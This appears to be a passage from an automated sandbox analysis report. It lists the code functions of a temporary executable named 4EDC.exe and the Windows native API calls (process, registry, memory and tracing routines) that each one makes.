Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_004017DA Sleep,NtTerminateProcess, 22_2_004017DA
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_004017F8 NtTerminateProcess, 22_2_004017F8
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_0040209A NtQuerySystemInformation, 22_2_0040209A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_004017A3 Sleep,NtTerminateProcess, 22_2_004017A3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049600 ZwOpenKey,LdrInitializeThunk, 22_2_6C049600
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049660 ZwAllocateVirtualMemory,LdrInitializeThunk, 22_2_6C049660
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04967A NtQueryInformationProcess,LdrInitializeThunk, 22_2_6C04967A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049780 ZwMapViewOfSection,LdrInitializeThunk, 22_2_6C049780
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049820 ZwEnumerateKey,LdrInitializeThunk, 22_2_6C049820
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049860 ZwQuerySystemInformation,LdrInitializeThunk, 22_2_6C049860
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0498C0 ZwDuplicateObject,LdrInitializeThunk, 22_2_6C0498C0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0499A0 ZwCreateSection,LdrInitializeThunk, 22_2_6C0499A0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C040413 ZwUnmapViewOfSection, 22_2_6C040413
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8C14 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C0D8C14
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C1411 ZwTraceEvent, 22_2_6C0C1411
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00E420 RtlpLoadUserUIByPolicy,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlpLoadUserUIByPolicy,ZwClose, 22_2_6C00E420
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04A420 ZwGetNlsSectionPtr, 22_2_6C04A420
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02FC39 ZwAssociateWaitCompletionPacket, 22_2_6C02FC39
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C091C49 ZwQueryInformationProcess, 22_2_6C091C49
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049C40 ZwAllocateVirtualMemoryEx, 22_2_6C049C40
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C005450 RtlClearThreadWorkOnBehalfTicket,memcmp,RtlClearThreadWorkOnBehalfTicket,ZwSetInformationThread, 22_2_6C005450
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0B3C60 RtlFlushSecureMemoryCache,ZwQueryVirtualMemory, 22_2_6C0B3C60
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02746D RtlLeaveCriticalSection,ZwClose,RtlFreeHeap, 22_2_6C02746D
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049C70 ZwAlpcConnectPort, 22_2_6C049C70
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C045C70 TpSetPoolMaxThreadsSoftLimit,ZwSetInformationWorkerFactory, 22_2_6C045C70
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03AC7B ZwFreeVirtualMemory,RtlFillMemoryUlong,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,DbgPrint,DbgPrint,DbgPrint, 22_2_6C03AC7B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8C75 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C0D8C75
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C091C76 ZwQueryInformationProcess, 22_2_6C091C76
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04A480 ZwInitializeNlsFiles, 22_2_6C04A480
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4496 ZwAllocateVirtualMemory,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint, 22_2_6C0C4496
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C083C93 wcschr,RtlInitUnicodeString,wcstoul,RtlAnsiStringToUnicodeString,RtlCompareUnicodeString,ZwProtectVirtualMemory,DbgPrintEx,RtlFreeUnicodeString, 22_2_6C083C93
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00EC9B RtlInitUnicodeString,ZwOpenKey,RtlpLoadUserUIByPolicy,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlFreeHeap,ZwClose,ZwClose,RtlInitUnicodeString,ZwOpenKey,RtlAllocateHeap,RtlpLoadMachineUIByPolicy,ZwClose, 22_2_6C00EC9B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C040CA1 ZwQuerySecurityAttributesToken,ZwQuerySecurityAttributesToken,ZwQuerySecurityAttributesToken, 22_2_6C040CA1
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D4CAB ZwTraceControl, 22_2_6C0D4CAB
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D9CB3 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C0D9CB3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03CCC0 memcpy,RtlGetNtSystemRoot,RtlInitUnicodeString,memcpy,ZwOpenKey,ZwClose,ZwEnumerateKey,DbgPrintEx,DbgPrintEx,DbgPrintEx, 22_2_6C03CCC0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04A4C0 ZwIsUILanguageComitted, 22_2_6C04A4C0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C002CDB RtlFreeHeap,ZwClose,ZwSetEvent, 22_2_6C002CDB
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8CD6 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C0D8CD6
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00F4E3 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent, 22_2_6C00F4E3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C091CE4 ZwQueryInformationProcess, 22_2_6C091CE4
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0B64FB ZwOpenKey,ZwQueryValueKey,RtlEqualUnicodeString,RtlEqualUnicodeString,RtlEqualUnicodeString,ZwClose, 22_2_6C0B64FB
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C14FB memset,RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C0C14FB
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C091D0B ZwSetInformationProcess, 22_2_6C091D0B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04AD10 ZwSetCachedSigningLevel, 22_2_6C04AD10
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C031520 RtlInitializeCriticalSectionEx,RtlInitializeCriticalSectionEx,RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C031520
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049520 ZwWaitForSingleObject, 22_2_6C049520
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BFD22 ZwQueryInformationProcess,RtlUniform, 22_2_6C0BFD22
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C034D3B memset,RtlRunOnceExecuteOnce,ZwTraceControl,memcmp,RtlNtStatusToDosError,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap, 22_2_6C034D3B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8D34 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C0D8D34
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C091D43 ZwQueryInformationThread, 22_2_6C091D43
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C030548 RtlEnterCriticalSection,RtlLeaveCriticalSection,RtlRbInsertNodeEx,ZwQueryVirtualMemory, 22_2_6C030548
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D1D55 ZwFreeVirtualMemory,RtlWakeAddressAllNoFence, 22_2_6C0D1D55
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C091D6A ZwWaitForMultipleObjects, 22_2_6C091D6A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C6D61 ZwAllocateVirtualMemoryEx, 22_2_6C0C6D61
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049D70 ZwAlpcQueryInformation, 22_2_6C049D70
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C091570 ZwQuerySystemInformation,RtlInitUnicodeString,memset,ZwAlpcConnectPort,ZwAlpcSendWaitReceivePort,ZwClose, 22_2_6C091570
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C01DD80 RtlAcquireSRWLockShared,ZwQueryVirtualMemory,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlRaiseStatus,RtlAddressInSectionTable,RtlImageDirectoryEntryToData, 22_2_6C01DD80
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0CB581 RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C0CB581
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C1582 ZwTraceEvent, 22_2_6C0C1582
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C003591 ZwSetInformationFile, 22_2_6C003591
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0065A0 RtlpGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwQueryLicenseValue,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetVersion, 22_2_6C0065A0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049DA0 ZwAlpcSendWaitReceivePort, 22_2_6C049DA0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0495B0 ZwSetInformationThread, 22_2_6C0495B0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049DB0 ZwAlpcSetInformation, 22_2_6C049DB0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C004DC0 RtlpUnWaitCriticalSection,RtlWakeAddressAllNoFence,RtlRaiseStatus,TpWaitForAlpcCompletion,RtlpUnWaitCriticalSection,ZwSetEvent,TpWaitForAlpcCompletion,ZwAlpcQueryInformation, 22_2_6C004DC0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0495C0 ZwSetEvent, 22_2_6C0495C0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02EDC4 ZwCancelWaitCompletionPacket, 22_2_6C02EDC4
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0045D0 RtlGetThreadWorkOnBehalfTicket,RtlGetThreadWorkOnBehalfTicket,ZwQueryInformationThread, 22_2_6C0045D0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0495D0 ZwClose, 22_2_6C0495D0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BFDD3 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C0BFDD3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049DE0 ZwAssociateWaitCompletionPacket, 22_2_6C049DE0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0095F0 TpSetPoolMinThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,TpSetPoolMinThreads, 22_2_6C0095F0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BBDFA RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive, 22_2_6C0BBDFA
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0495F0 ZwQueryInformationFile, 22_2_6C0495F0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00C600 LdrQueryImageFileKeyOption,RtlInitUnicodeStringEx,ZwQueryValueKey,LdrQueryImageFileKeyOption,RtlFreeHeap,RtlAllocateHeap,ZwQueryValueKey,RtlFreeHeap,RtlUnicodeStringToInteger,memcpy, 22_2_6C00C600
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049610 ZwEnumerateValueKey, 22_2_6C049610
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C042E1C RtlInitializeCriticalSectionEx,ZwDelayExecution, 22_2_6C042E1C
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C092E14 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C092E14
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049E20 ZwCancelTimer2, 22_2_6C049E20
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D3E22 ZwTraceControl,RtlNtStatusToDosError,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error, 22_2_6C0D3E22
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00B630 ZwWaitForKeyedEvent, 22_2_6C00B630
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BFE3F memset,RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C0BFE3F
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049E30 ZwCancelWaitCompletionPacket, 22_2_6C049E30
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04B640 RtlUnhandledExceptionFilter,ZwTerminateProcess, 22_2_6C04B640
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04B650 RtlUnhandledExceptionFilter,ZwTerminateProcess, 22_2_6C04B650
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049650 ZwQueryValueKey, 22_2_6C049650
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C096652 ZwClose,RtlAllocateHeap,memcpy,ZwUnmapViewOfSection, 22_2_6C096652
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03BE62 ZwProtectVirtualMemory,RtlGetCurrentTransaction,RtlGetCurrentTransaction, 22_2_6C03BE62
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04AE70 ZwSetInformationWorkerFactory, 22_2_6C04AE70
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049670 ZwQueryInformationProcess, 22_2_6C049670
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C003E80 RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C003E80
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BBE9B RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive, 22_2_6C0BBE9B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03DE9E RtlAcquireSRWLockExclusive,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwUnsubscribeWnfStateChange,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlFreeHeap, 22_2_6C03DE9E
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C002E9F ZwCreateEvent,ZwClose, 22_2_6C002E9F
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049EA0 ZwCompareSigningLevels, 22_2_6C049EA0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C092EA3 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C092EA3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D3EBC ZwTraceControl,RtlNtStatusToDosError,RtlSetLastWin32Error, 22_2_6C0D3EBC
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02E6B0 RtlSetThreadWorkOnBehalfTicket,memcmp,ZwSetInformationThread,RtlSetThreadWorkOnBehalfTicket, 22_2_6C02E6B0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0496C0 ZwSetInformationProcess, 22_2_6C0496C0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C039ED0 RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlAcquireSRWLockShared,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,ZwWaitForAlertByThreadId, 22_2_6C039ED0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0496D0 ZwCreateKey, 22_2_6C0496D0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0066D4 RtlInitUnicodeString,ZwQueryValueKey, 22_2_6C0066D4
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C002ED8 ZwWaitForAlertByThreadId,ZwWaitForAlertByThreadId, 22_2_6C002ED8
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8ED6 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C0D8ED6
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0496E0 ZwFreeVirtualMemory, 22_2_6C0496E0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00B6F0 EtwEventWriteNoRegistration,ZwTraceEvent,RtlNtStatusToDosError, 22_2_6C00B6F0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0916FA ZwQueryWnfStateNameInformation,ZwUpdateWnfStateData,EtwEventWriteNoRegistration, 22_2_6C0916FA
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C05DEF0 RtlRaiseException,RtlCaptureContext,ZwRaiseException,RtlRaiseStatus, 22_2_6C05DEF0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02E6F9 ZwAlpcSetInformation, 22_2_6C02E6F9
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0176FE RtlInitUnicodeString,RtlAppendUnicodeToString,RtlAppendUnicodeToString,RtlAppendUnicodeToString,ZwOpenKey,ZwClose, 22_2_6C0176FE
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C039702 RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwReleaseWorkerFactoryWorker, 22_2_6C039702
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049710 ZwQueryInformationToken, 22_2_6C049710
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C096715 memset,memcpy,ZwTraceEvent, 22_2_6C096715
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03E730 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid, 22_2_6C03E730
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049730 ZwQueryVirtualMemory, 22_2_6C049730
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BCF30 ZwAlertThreadByThreadId, 22_2_6C0BCF30
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049740 ZwOpenThreadToken, 22_2_6C049740
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03174B ZwFreeVirtualMemory,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory, 22_2_6C03174B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C040F48 ZwOpenKey,ZwClose,ZwClose,ZwCreateKey,RtlInitUnicodeStringEx,ZwSetValueKey,RtlInitUnicodeStringEx,ZwSetValueKey,ZwClose, 22_2_6C040F48
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C08A746 ZwGetCachedSigningLevel,ZwCompareSigningLevels,ZwSetCachedSigningLevel, 22_2_6C08A746
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049750 ZwQueryInformationThread, 22_2_6C049750
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C095F5F RtlInitUnicodeString,ZwOpenFile,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlAllocateHeap,RtlInitUnicodeString,ZwQueryDirectoryFile,RtlAllocateHeap,memcpy,RtlFreeHeap,ZwClose, 22_2_6C095F5F
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C006F60 RtlGetPersistedStateLocation,ZwOpenKey,memcpy,RtlGetPersistedStateLocation,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlAllocateHeap,ZwQueryValueKey,RtlExpandEnvironmentStrings,memcpy,ZwClose,ZwClose,RtlFreeHeap, 22_2_6C006F60
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04AF60 ZwSetTimer2, 22_2_6C04AF60
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C09176C ZwOpenEvent,ZwWaitForSingleObject,ZwClose, 22_2_6C09176C
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8F6A RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C0D8F6A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03CF6A memcpy,memcpy,RtlDosPathNameToRelativeNtPathName_U,ZwOpenFile,memcpy,RtlFreeHeap,RtlDeleteBoundaryDescriptor,DbgPrintEx,DbgPrintEx,DbgPrintEx,ZwClose,RtlFreeHeap,DbgPrintEx,memcpy,DbgPrintEx,ZwClose, 22_2_6C03CF6A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049F70 ZwCreateIoCompletion, 22_2_6C049F70
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049770 ZwSetInformationFile, 22_2_6C049770
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BCF70 RtlpGetUserOrMachineUILanguage4NLS,RtlInitUnicodeString,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,ZwClose, 22_2_6C0BCF70
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C095780 DbgPrompt,ZwWow64DebuggerCall, 22_2_6C095780
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0B5F87 ZwUnmapViewOfSection, 22_2_6C0B5F87
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03FF9C RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlInitUnicodeString, 22_2_6C03FF9C
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C08A7AC ZwCompareSigningLevels,ZwCompareSigningLevels, 22_2_6C08A7AC
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0497A0 ZwUnmapViewOfSection, 22_2_6C0497A0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C043FA0 RtlGetLocaleFileMappingAddress,ZwInitializeNlsFiles,RtlGetLocaleFileMappingAddress,ZwUnmapViewOfSection, 22_2_6C043FA0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C002FB0 RtlDestroyHeap,RtlDeleteCriticalSection,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlDestroyHeap,DbgPrint,DbgPrint,DbgPrint,RtlDebugPrintTimes,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwTraceEvent,RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C002FB0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00F7C0 EtwNotificationUnregister,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwClose,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,EtwNotificationUnregister, 22_2_6C00F7C0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0497C0 ZwTerminateProcess, 22_2_6C0497C0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03D7CA RtlImageNtHeader,RtlFreeHeap,ZwCreateSection,ZwMapViewOfSection,ZwClose,RtlImageNtHeader,ZwClose,RtlFreeHeap,ZwClose,ZwClose,ZwUnmapViewOfSection, 22_2_6C03D7CA
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04AFD0 ZwShutdownWorkerFactory, 22_2_6C04AFD0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03DFDF RtlWakeAddressAllNoFence,ZwAlertThreadByThreadId,RtlWakeAddressAllNoFence, 22_2_6C03DFDF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C090FEC ZwDuplicateObject,ZwDuplicateObject, 22_2_6C090FEC
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0337EB RtlImageNtHeader,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,ZwCreateIoCompletion,ZwCreateWorkerFactory,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwSetInformationWorkerFactory, 22_2_6C0337EB
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C010FFD RtlInitUnicodeString,ZwQueryValueKey, 22_2_6C010FFD
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00E009 memset,ZwIsUILanguageComitted,RtlpGetNameFromLangInfoNode,ZwQueryInstallUILanguage,RtlLCIDToCultureName,RtlFreeHeap, 22_2_6C00E009
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0DF019 RtlInitUnicodeString,RtlInitUnicodeString,ZwQueryValueKey,RtlAllocateHeap,ZwQueryValueKey,RtlInitUnicodeString,ZwClose,RtlFreeHeap, 22_2_6C0DF019
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00F018 RtlAllocateHeap,ZwQueryValueKey,memcpy,RtlFreeHeap, 22_2_6C00F018
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C034020 RtlGetVersion,RtlGetSuiteMask,RtlGetNtProductType,RtlInitUnicodeString,ZwQueryLicenseValue,RtlGetSuiteMask,RtlGetVersion, 22_2_6C034020
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049830 ZwOpenFile, 22_2_6C049830
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049840 ZwDelayExecution, 22_2_6C049840
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C005050 RtlSetCurrentDirectory_U,RtlAllocateHeap,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlSetCurrentDirectory_U,RtlFreeHeap,RtlFreeHeap, 22_2_6C005050
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049850 ZwQueryDirectoryFile, 22_2_6C049850
